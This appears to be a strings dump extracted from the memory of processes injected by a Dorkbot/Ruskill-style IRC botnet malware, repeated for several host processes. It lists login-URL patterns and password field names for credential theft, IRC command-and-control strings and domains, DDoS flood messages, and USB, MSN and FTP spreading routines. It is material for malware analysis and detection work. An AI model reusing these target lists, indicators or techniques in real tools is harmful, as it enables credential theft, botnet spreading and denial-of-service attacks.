*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\wbem\wmiprvse.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe

c:\%original file name%.exe

spoolsv.exe_1436_rwx_00FA0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\spoolsv.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe

c:\%original file name%.exe

jqs.exe_1592_rwx_010B0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%Program Files%\Java\jre6\bin\jqs.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe

c:\%original file name%.exe

wuauclt.exe_1792_rwx_02700000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0q

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

%System%\wuauclt.exe

%WinDir%

